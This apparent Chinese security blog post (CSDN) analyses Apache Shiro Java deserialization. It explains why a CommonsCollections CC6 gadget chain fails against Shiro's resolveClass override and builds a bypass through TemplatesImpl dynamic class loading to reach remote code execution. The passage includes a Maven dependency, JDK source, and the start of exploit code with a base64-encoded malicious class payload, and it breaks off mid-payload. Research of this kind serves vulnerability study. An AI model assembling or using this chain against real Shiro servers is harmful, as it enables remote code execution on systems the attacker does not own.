[Java反序列化]—Shiro反序列化(二)

最新推荐文章于 2024-09-10 08:44:48 发布

snowlyzz

最新推荐文章于 2024-09-10 08:44:48 发布

阅读量562

点赞数 1

分类专栏： JAVA安全文章标签： java 开发语言

本文链接：https://blog.csdn.net/snowlyzz/article/details/128192360

版权

本文详细探讨了Java Shiro框架中的反序列化漏洞，重点在于如何绕过数组加载限制，通过构造特定的CC链来实现远程代码执行（RCE）。分析指出，Shiro的ClassResolvingObjectInputStream重写了resloveClass方法，导致无法加载数组类。为了规避这个问题，利用动态加载来加载类，从而避免数组问题。文中提到了通过修改ChainedTransformer中的transform方法，利用可控的key参数来替换ConstantTransformer，最终目标是触发TemplatesImpl的newTransformer方法，达到动态加载并执行代码的目的。

摘要由CSDN通过智能技术生成

0x01

这篇利用CC链来进行RCE

利用分析

在shiro-web 中加上CC依赖

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
            <scope>compile</scope>
        </dependency>

分析：

直接利用CC6的链子来打是不行的，会提示类加载[L.....] 其实就是不允许加载这个 Transformer[]了

原因是 ClassResolvingObjectInputStream 重写了 reselveClass，返回的是一个 ClassUtils.forName(osc.getName())

而原生类则是返回 Class.forName()

protected Class<?> resolveClass(ObjectStreamClass desc)
    throws IOException, ClassNotFoundException
{
    String name = desc.getName();
    try {
        return Class.forName(name, false, latestUserDefinedLoader());
    } catch (ClassNotFoundException ex) {
        Class<?> cl = primClasses.get(name);
        if (cl != null) {
            return cl;
        } else {
            throw ex;
        }
    }
}

所以区别就是shiro中重写的resolveClass()调用的是自己写的一个工具类ClassUtils中的forName方法，所以不能加载数组类。（深入的是开发的知识，暂不了解

链构造：

现在就要绕过数组问题，我们可以利用动态加载来而已加载一个类，这样不会出现数组问题

可以先把 CC3的前半部分拿过来

        Templates templates = new TemplatesImpl();
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy